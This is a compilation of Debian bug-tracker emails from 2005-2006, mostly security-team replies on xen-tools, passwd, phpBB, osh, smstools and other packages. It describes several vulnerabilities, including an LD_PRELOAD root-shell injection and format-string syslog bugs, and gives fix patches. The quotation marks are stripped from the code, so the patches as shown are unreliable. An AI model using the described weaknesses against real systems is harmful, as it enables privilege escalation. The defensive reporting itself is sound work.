suggest that you repeat the command with --dist=sarge --debootstrap as an initial step. If that fails, or if you wish to generate more output please add --verbose and send the log to this bug report. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#379347: further tests - no success
On Sun, Jul 23, 2006 at 01:03:33AM +0200, Henning Sprang wrote: I also tried the same with a loopback dislk image - no success. OK that is good to know. I do exactlky what is documented, and have no idea how to investigate the problem further. I've given you things to try. The most obvious is adding --dist=sarge --debootstrap. If that fails too then add --verbose so that all the diagnostics are available. Let me know what I can try to give more help on solving this bug. I have. Twice now. Maybe the call to the external program should not be made in a way that analyhzingf problems is impossible, and there should be a way to keep the tmp data. You can, it is stored in the LVM file you specified. Simply mount it. (If you used the loopback image you could also mount that after the failure occurs). Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#379347: xen-tools: xen-create image fails at xt-create-image
On Sun, Jul 23, 2006 at 01:27:51AM +0200, Henning Sprang wrote: Actually, that helped, as said before, but it is not clear, or even evident, that --debootstrap/--rpmstrap must be given from the manpage, I think it is - from man xen-create-image: --cut-- INSTALLATION METHODS The new guest images may be installed in several different ways: 1. With the Bdebootstrap command. 2. With the Brpmstrap command. 3. By copying an existing installation. 4. By untarring a file containing a previous installation. These different methods can be selected by either the command line arguments, or settings in the configuration file. --cut-- (Hmm that should be --debootstrap option, and --rpmstrap option respectively. Will update that.) and it also seems unreasonable - you can't install sarge/etch with rpmstrap, and you can't install centos or fedora with debootstrap. Bu maybe you are working on a secret dpkg for centos?! :) I guess that is true - but you might want to install sarge by untarring, or copying a previously created image. So dist=sarge cannot be assumed to mean debootstrap. Thats the main reason why these are distinct, and mutually exclusive, options. Severity still important in my opionion because the tool isn't useable without major tweaking around with all the options. I will update the code to ensure at least one option is supplied for the installation method, which I will regard as closing this bug. (ie in your example it would output a message and exit: please choose one of the following options: --debootstrap - Install with debootstrap --rpmstrap- Install the dist with rpmstrap --copy- Copy from the selected directory .. etc) However I disagree utterly with the major tweaking, because this option could be specified in the configuration file as the comments indicate. I have to assume that people attempting to use software will examine the configuration file. Otherwise you could claim that apt-get is broken because the default configuration file doesn't point to a local mirror without major tweaking. .. still I'm glad you got it working now :) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#372531: Update of wzdftpd 0.5.2-1.1sarge1 for 3.1r3
On Tue, Jul 04, 2006 at 02:39:00PM +0200, Pierre Chifflier wrote:
On Tue, Jul 04, 2006 at 02:30:10PM +0200, Julien Danjou wrote:
Hello,
The fix for DSA-1006-1 on wzdftpd broke dependencies as explained in bug
report #372531.
We would like to see this bug fixed in the next stable point-release.
Would it be possible to the security team to fix this package or maybe to
the
maintainer to upload a new and fixed version of its package?
Please, keep us in touch, since we plan to point-release ASAP.
Hi,
Since the debian/control files uses only depends like:
wzdftpd (= ${Source-Version})
a simple rebuild should fix the problem.
If you're not expectng a new advisory then building it yourself
would be appreciated.
Steve
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#372719: regression in FreeType security fix for DSA-1095
On Sun, Jun 25, 2006 at 03:09:51PM -0700, Steve Langasek wrote: As mentioned earlier this month, a regression was found in the freetype 2.1.7-2.5 package uploaded for DSA-1095 which caused applications to crash with division-by-zero errors. I've prepared a maintainer upload to fix this regression using the patch from bug #373581, which can be found at http://people.debian.org/~vorlon/freetype-DSA/. Can I upload this to security.d.o for a revised DSA? Yes, please do. Steve -- signature.asc Description: Digital signature
Bug#375267: xen-tools: FTBFS: Test failures
On Sat, Jun 24, 2006 at 05:21:32PM -0400, Daniel Schepler wrote: From my pbuilder build log: Good catch, thanks for reporting it. ... tests/getopt..ok 1 - File exists: ./bin/xen-create-image ok 2 - File is executable Cannot read file '/etc/xen-tools/xen-tools.conf' - No such file or directory at ./bin/xen-create-image line 736. OK this is a stupid error on my part. What is happening here is that we attempt to run the following command: ./bin/xen-create-image --help This is done specifically so that we can capture the options which are allegedly supported by the tool. Then we can actually ensure that every option advertised is actually available/used. This test was added recently as a result of: #374987: --fs is a unknown option However since the software isn't installed it aborts on failing to read the configuration file. Typically I'd just add a --test flag, but that won't work in this case since we expect to read the configuration file and *then* parse the command line arguments! I will update the test shortly to avoid this execution. In the mean time removing make test from the debian/rules file will allow it to build... although this is clearly not an ideal solution. The test suite should be runnable without the software being installed and it mostly is... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com
On Sat, Jun 17, 2006 at 08:01:22PM +0200, Robert Millan wrote: Package: firefox Severity: grave Tags: security Not a security bug. When pasting using X11 clipboard to a firefox window, unless the focus is in a specific place like the navigation bar or an edit box, it'll assume you want to go to keyword:$clipboard, which happens to be an alias for google I'm feeling lucky search. This can be disabled. Open about:config in your address bar, and enter middle in the filter window. Click show all and you can disable various middle-click options. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com
On Sat, Jun 17, 2006 at 10:30:40PM +0200, Robert Millan wrote: Thanks, it seems disabling middlemouse.contentLoadURL gets rid of the problem. Could you make this the default? I think that is up to either a) Firefox upstream b) The Debian firefox maintainers It certainly isn't the responsability of the Security Team, so I'm not going to argue for or against. Steve -- signature.asc Description: Digital signature
Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution
On Tue, May 30, 2006 at 07:14:11PM +0200, Jeroen van Wolffelaar wrote: On Tue, May 30, 2006 at 09:55:16AM +0200, Thijs Kinkhorst wrote: On Sun, 2006-05-28 at 22:11 +0100, Steve Kemp wrote: Uploaded. Thanks! But... can't find the upload anywhere? Maybe something went wrong or am I looking the wrong way? I got a 'upload removed due to not being signed by gnupg/gpg' mail. So, it looks like something went wrong. Strange. I don't remember noticing an upload error, or a signing error. I've resigned + reuploaded for you. If it works great, if not I guess test that network access ;) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution
On Sun, May 28, 2006 at 11:02:18PM +0200, Thijs Kinkhorst wrote: On Tue, 2006-05-23 at 12:36 +0200, Thijs Kinkhorst wrote: Problem is that Jeroen announced that he's on a trip through Mexico now, so I'm left without someone to upload. Maybe the (testing) security team or any other DD interested in getting this bug fixed, can take a look and upload? Please find the updated packages here: http://www.a-eskwadraat.nl/~kink/phpbb/ Still looking for an uploader here... thanks. Uploaded. Steve -- Thijs ___ Secure-testing-team mailing list Secure-testing-team@lists.alioth.debian.org http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team -- Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit signature.asc Description: Digital signature
Bug#360657: passwd SIGSEGV on empty password
On Mon, Apr 03, 2006 at 10:59:32PM +0200, Matteo Croce wrote: Package: passwd Version: 1:4.0.14-9 Severity: critical Tags: security Justification: root security hole Just press ^D instead of the new password and passwd will segfaults. I think that this is grave because it's set uid root. Interestingly this only happens upon my Sid machine. Upon Sarge it works as expected: [EMAIL PROTECTED]:~$ passwd Changing password for skx (current) UNIX password: Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied passwd: Authentication token manipulation error On unstable it behaves as you describe: [EMAIL PROTECTED]:~$ passwd Changing password for skx (current) UNIX password: Enter new UNIX password: Retype new UNIX password: Segmentation fault Under gdb I see this: Retype new UNIX password: Program received signal SIGSEGV, Segmentation fault. 0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so (gdb) bt #0 0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so #1 0xb7fa9a9a in _pam_dispatch () from /lib/libpam.so.0 #2 0xb7fabfa3 in pam_chauthtok () from /lib/libpam.so.0 #3 0x0804b1df in ?? () #4 0x08052388 in ?? () #5 0x in ?? () Unfortunately I don't have time tonight to investigate, but it looks like it is a pam_unix.so / libpam.so bug, rather than a passwd bug. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#350964: CVE-2006-0225, scponly shell command possible
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote: This bug has been closed for unstable (see bug 350964) with the 4.6 upload, but will it be fixed for sarge? Please see DSA-969-1 released two days ago: http://www.us.debian.org/security/2006/dsa-969 Sarge is fixed. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#349555: komi - FTBFS: cannot find -lgp
On Wed, Jan 25, 2006 at 12:29:32PM +0100, Thierry Reding wrote: * Bastian Blank wrote: Package: komi Version: 1.03-4 Severity: serious There was an error while trying to autobuild your package: I've investigated this a bit, and it looks like the upstream Makefile links statically against SDL. I've tried rebuilding with dynamic linking and it solves the FTBFS. Any reason why komi would link statically against SDL? Steve? If not, maybe the attached patch should be applied. I see nothing wrong with this patch. (Although I'm wondering why this build failure didn't manifest itself previously..?) If you wish to upload a fixed package feel free. Otherwise I'll do it tomorrow evening. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#349283: tor: Tor security advisory: hidden services can be located quickly
On Sat, Jan 21, 2006 at 07:17:36PM -0500, Chris Howie wrote: Package: tor Version: 0.1.0.16-1 Severity: grave Tags: security Justification: user security hole Tor isn't included in a Debian stable release, so no need for a DSA. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#346101: Strace log not being accepted
On Wed, Jan 11, 2006 at 03:46:19PM -0600, Bonilla, Alejandro wrote: I have sent the strace of apachetop and the bug system is not letting it in, maybe as an spam check? Here goes again attached. Cheers, got it. Looks like I tracked down the bug without this. See : http://lists.debian.org/debian-devel/2006/01/msg00648.html The proble appears to be that a structure is allocated and not initialized to NULL, so an invalid free appears. The fix is in the message linked to above - and I'll upload a new revision shortly. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#347221: smstools: Format string attack in logging code
Package: smstools
Version: 1.16-1+b1
Severity: grave
Justification: user security hole
Tags: security
*** Please type your report below this line ***
A DSA has just been released for smstools due to an insecure
usage of syslog in the logging code.
The following patch will correct the issue:
--- smstools-1.14.8.orig/src/logging.c
+++ smstools-1.14.8/src/logging.c
@@ -78,7 +78,7 @@
va_end(argp);
if (Filehandle0)
{
-syslog(severity,text);
+syslog(severity,%s,text);
}
else
{
Steve
--
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.6-xen
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Versions of packages smstools depends on:
ii libc6 2.3.5-11 GNU C Library: Shared libraries an
ii libmm14 1.4.0-1Shared memory library - runtime
smstools recommends no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import
On Fri, Dec 23, 2005 at 12:10:00AM +0100, Florian Ernst wrote: Steve, btw, any news on CVE-2005-3302 aka bug#330895 (arbitrary code execution when importing a .bvh file)? Last I heard you were going to prepare an update unless anybody had an issue with the changes made, yet I haven't heard of any such issues (or anything at all, to be precise) since then... Utterly slipped my mind. :( FWIW, I've put together an update for Sarge's version of the blender package based on the upstream change mentioned above, please find attached a cumulative interdiff for both CVE-2005-3302 aka bug#330895 and this bug so these issues can be resolved for Sarge. Great, thanks a lot. Please tell whether you deem those patches sufficient for a potential future security advisory, and if not, please provide pointers at what might be missing. It looks good to me. I've built a package and if nobody has any objections I'll upload later today. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import
On Fri, Dec 23, 2005 at 05:56:59PM +0100, Wouter van Heyst wrote: It looks good to me. I've built a package and if nobody has any objections I'll upload later today. No objections from me. Great I already uploaded the package ;) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#340284: mozilla-firefox: su root -c firefox gives root access to any other firefox loaded.
On Tue, Nov 22, 2005 at 12:36:46PM +0100, S. Thommerel wrote: To reproduce this bug: su root and then load firefox from the term. Then launch firefox from another unrelated and normal user terminal. The newly launched firefox reads root's profile and gets root's rights. Isn't this expected behaviour from Firefox? When invoking new copies it doesn't spawn an independent new instance, instead it connects to the already-running instance? I guess it's a security hole in a sense... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#340079: insecure tempfiles
On Sun, Nov 20, 2005 at 08:17:17PM +0100, Uwe Zeisberger wrote: Tags: security patch With the attached patch applied, it uses mktemp for their creation. The patch is .. missing. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
On Wed, Nov 16, 2005 at 02:05:11PM +0100, Loic Minier wrote: Security team, did you start work on CVE-2005-3186 and CVE-2005-2975, CVE-2005-2976 (not described in this report)? Ubuntu has released some packages which might help http://www.ubuntu.com/usn/usn-216-1. Do you need the Gtk maintainers to prepare an upload for stable? That would certainly be appreciated. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#338312: osh: Environment Variable Input Validation Bug
On Wed, Nov 09, 2005 at 04:42:08AM -0800, Charles Stevenson wrote: Due to a bug in the environment variable substitution code it is possible to inject environment variables such as LD_PRELOAD and gain a root shell. Confirmed. Joey we'll need an ID for it. I guess we need to use two buffers to handle the expansion correctly... Steve --
Bug#328129: PATCH: The following patch fixes this issue
The following patch extracted from the SF.net discussion linked
above fixes the issue for me.
Steve
--
--- xine-ui-0.99.3.orig/src/xitk/menus.c
+++ xine-ui-0.99.3/src/xitk/menus.c
@@ -425,8 +425,7 @@
int x, y;
xitk_menu_widget_t menu;
char buffer[2048];
- char*sh[255];
- int shc = 0;
+ int i;
xitk_widget_t *w;
#ifdef HAVE_XINERAMA
int fullscr_mode = (FULLSCR_MODE | FULLSCR_XI_MODE);
@@ -439,15 +438,15 @@
title,
NULL, NULL
},
{ _(Show controls),
- (sh[shc++] = menu_get_shortcut(ToggleVisibility)),
+ menu_get_shortcut(ToggleVisibility),
panel_is_visible() ? checked : check,
menu_panel_visibility, NULL
},
{ _(Show video window),
- (sh[shc++] = menu_get_shortcut(ToggleWindowVisibility)),
+ menu_get_shortcut(ToggleWindowVisibility),
video_window_is_visible() ? checked : check,
menu_video_ctrl, (void *) VIDEO_TOGGLE
},
{ _(Fullscreen),
- (sh[shc++] = menu_get_shortcut(ToggleFullscreen)),
+ menu_get_shortcut(ToggleFullscreen),
(video_window_get_fullscreen_mode() fullscr_mode) ? checked :
check,
menu_video_ctrl, (void *) VIDEO_FULLSCR
},
{ SEP,
@@ -459,7 +458,7 @@
branch,
NULL, NULL
},
{ _(Open/File...),
- (sh[shc++] = menu_get_shortcut(FileSelector)),
+ menu_get_shortcut(FileSelector),
NULL,
menu_file_selector,NULL
},
{ _(Open/Playlist...),
@@ -467,7 +466,7 @@
NULL,
menu_playlist_ctrl, (void *) PLAYL_LOAD
},
{ _(Open/Location...),
- (sh[shc++] = menu_get_shortcut(MrlBrowser)),
+ menu_get_shortcut(MrlBrowser),
NULL,
menu_mrl_browser, NULL
},
{ _(Playback),
@@ -475,15 +474,15 @@
Branch,
NULL, NULL
},
{ _(Playback/Play),
- (sh[shc++] = menu_get_shortcut(Play)),
+ menu_get_shortcut(Play),
NULL,
menu_playback_ctrl, (void *) PLAYB_PLAY
},
{ _(Playback/Stop),
- (sh[shc++] = menu_get_shortcut(Stop)),
+ menu_get_shortcut(Stop),
NULL,
menu_playback_ctrl, (void *) PLAYB_STOP
},
{ _(Playback/Pause),
- (sh[shc++] = menu_get_shortcut(Pause)),
+ menu_get_shortcut(Pause),
NULL,
menu_playback_ctrl, (void *) PLAYB_PAUSE
},
{ _(Playback/SEP),
@@ -491,11 +490,11 @@
separator,
NULL, NULL
},
{ _(Playback/Next MRL),
- (sh[shc++] = menu_get_shortcut(NextMrl)),
+ menu_get_shortcut(NextMrl),
NULL,
menu_playback_ctrl, (void *) PLAYB_NEXT
},
{ _(Playback/Previous MRL),
- (sh[shc++] = menu_get_shortcut(PriorMrl)),
+ menu_get_shortcut(PriorMrl),
NULL,
menu_playback_ctrl, (void *) PLAYB_PREV
},
{ _(Playback/SEP),
@@ -503,11 +502,11 @@
separator,
NULL, NULL
},
{ _(Playback/Increase Speed),
- (sh[shc++] = menu_get_shortcut(SpeedFaster)),
+ menu_get_shortcut(SpeedFaster),
NULL,
menu_playback_ctrl, (void *) PLAYB_SPEEDM
},
{ _(Playback/Decrease Speed),
- (sh[shc++] = menu_get_shortcut(SpeedSlower)),
+ menu_get_shortcut(SpeedSlower),
NULL,
menu_playback_ctrl, (void *) PLAYB_SPEEDL
},
{ _(Playlist),
@@ -523,7 +522,7 @@
NULL,
menu_playlist_ctrl, (void *) PLAYL_LOAD
},
{ _(Playlist/Editor...),
- (sh[shc++] = menu_get_shortcut(PlaylistEditor)),
+ menu_get_shortcut(PlaylistEditor),
NULL,
menu_playlist_ctrl, (void *) PLAYL_EDIT
},
{ _(Playlist/SEP),
@@ -555,7 +554,7 @@
(gGui-playlist.loop == PLAYLIST_LOOP_SHUF_PLUS) ? checked :
check,
menu_playlist_ctrl, (void *) PLAYL_SHUF_PLUS
},
{ _(Playlist/Continue Playback),
Bug#335817: wordpress: SECURITY : Contains an insecure version of class.snoopy
Package: wordpress Version: 1.5.2-2 Severity: grave Justification: user security hole As described upon the following bugtraq post the class Snoopy which is included in wordpress potentially allows arbitary command execution. http://seclists.org/lists/fulldisclosure/2005/Oct/0536.html The class is contained within the wordpress distribution - although I haven't explicitly told them yet, I leave it to you to give them a nod. Steve -- -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-2-k7 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#335439: vncserver: passwords over 8 chars not handled correctly
On Sun, Oct 23, 2005 at 08:19:35PM -0400, Collin E Borrlewyn wrote: vncserver lets me in without supplying the full password. To reproduce this: start vncserver: vncserver :1 whe prompted enter a password of eight or more characters start xvncviewer and connect to :1 when prompted enter the first eight characters of the password and hit enter You have been authenticated. This appears to be a known weakness in VNC, for which I can find references going back to 1999. e.g. http://www.realvnc.com/pipermail/vnc-list/1999-November/010853.html The source documents this: vnc-3.3.7/vncpasswd/vncpasswd.c Always ignore anything after 8 characters, since this is what Solaris getpass() does anyway.. As does man vncpasswd: The password must be at least six characters long, and only the first eight characters are significant Perhaps a more prominent warning is required, but I consider it unlikely that this will be fixed if upstream is content with the current state Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#333682: security problem within CDDB communication
On Thu, Oct 13, 2005 at 10:52:28AM +0200, Michal ??iha?? wrote: xine announcement [1] is four day old, it says issue has been found by Debian Security Audit Project, so I'd expect that Debian will have it fixed also :-). We do. Sorry if you're already working on this issue and I interrupt you from work, but I wanted to make sure you know about this. Please see DSA-863, released on the 12th of October: http://www.us.debian.org/security/2005/dsa-863 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#327722: Patch for Gopher bug CAN-2005-2772
On Mon, Sep 26, 2005 at 09:23:16AM -0500, John Goerzen wrote: Attached are the patches that Joey (Schulze) approved. Can you (or Joey) comment: did you use a different patch because you believe mine to be insecure, or for a different reason? (That's an important question, since as you know, my patch was uploaded to unstable and will presumably be in the next stable release.) Your patch looks good. The reason that I used the one I did was because it was created a few weeks ago when there was no other patch publically available. Had I seen yours at the time I would have used it instead, rather than going with something different. I certainly don't think you need do anything drastic like use the one I made in another upload. Although it was a fair question to ask. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#325769: Format string security hole in anon-proxy
Package: anon-proxy
Version: 00.02.39-7
Severity: serious
Tags: patch, upstream
The logging code in anon-proxy contains a misuse of the syslog function
allowing potential remote compromise of the host it is running upon.
(This depends whether logging is enabled).
The patch below fixes the issue.
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
--- CAMsg.cpp-orig 2005-08-29 21:17:42.0 +0100
+++ CAMsg.cpp 2005-08-29 21:18:30.0 +0100
@@ -124,7 +124,7 @@
{
case MSG_LOG:
#ifndef _WIN32
-
syslog(type,oMsg.m_strMsgBuff);
+
syslog(type,%s,oMsg.m_strMsgBuff);
#endif
break;
case MSG_FILE:
[EMAIL PROTECTED]:/tmp/anon-proxy-00.02.39$
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#325135: maildrop: lockmail doesn't drop privileges
On Sat, Aug 27, 2005 at 07:03:55PM -0400, Andres Salomon wrote: Certainly. Once the advisory is out I can make an upload if Joy hasn't already made one. I can also do an upload; Joy already said I should comaintain, I've just been waiting for racke to do a new courier upload so that I can actually use maildrop (I have new maildrop packages in experimental that're just rotting away, waiting). I'll leave it to you then, unless you tell me differently. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#325135: maildrop: lockmail doesn't drop privileges
On Sat, Aug 27, 2005 at 12:27:51PM +0200, Martin Schulze wrote: Thanks a lot for the report. This is CAN-2005-2655. The bug affects 1.5.3-1.1 sarge/etch/sid and 1.8.1-2 in experimental, and should be easy to fix: Just add setgid(getgid()) before the execvp(). I tested the attached patch briefly and verified that it builds and prevents this bug. Steve, could you take care of sid and experimental packages if Joy is too busy? Certainly. Once the advisory is out I can make an upload if Joy hasn't already made one. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#299560: dsniff: fails due to not finding libnids
On Tue, Mar 15, 2005 at 01:36:08AM +0100, txemi wrote: Package: dsniff Version: 2.4b1-8 Severity: grave dsniff fails this way in debian testing after last upgrade: Strange it works for me. $ sudo dsniff dsniff: error while loading shared libraries: libnids.so.1.19: cannot open shared object file: No such file or directory Please show me the output of : ls -l `which dsniff` ls -l /usr/sbin/dsniff (The last time this was reported the user had a local copy in /usr/local/bin - I'm trying to make sure you're not doing that). Perhaps this bug should be forwarded to libnids. Keep it here for the moment. The problem seems to be that the version of dsniff you have installed is looking for libnids.so.1.19 when it starts - which it shouldn't because the package has an explicit dependency upon ...1.20. From the dpkg information included it looks like you have the most recent version of everythign so it should work. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#299560: dsniff: fails due to not finding libnids
On Tue, Mar 15, 2005 at 01:36:08AM +0100, txemi wrote: Package: dsniff Version: 2.4b1-8 I spoke too soon. libnids 1.20 has made it into testing. dsniff version 2.4b1-9 has not. This is not something I can fix, when the most recent version of dsniff makes it into testing your problem will be fixed. You have three choices: 1. Install an older version of libnids for the moment to allow dsniff to work. 2. Build from source yourself. 3. Wait. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#295556: FWD: [SECURITY] [DSA 684-1] New typespeed packages fix arbitrary group games code execution
On Wed, Feb 16, 2005 at 06:53:07PM +, Dafydd Harries wrote: Filing this bug to track the security hole in the DSA below. Apparently a fix for unstable has not yet been uploaded. Since I don't have a copy of the original security patch, I tried to extract the changes by interdiffing the fixed stable version with the latest unstable version. The changes to network.c and typespeed.c apply cleanly, but the changes to file.c don't. I'm working on resolving those conflicts. Note, however, that my time and Internet access are limited this week, and I won't be back home until next Monday, so it may be best for a fix to be NMUd. I can make one tomorrow if that would be useful? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
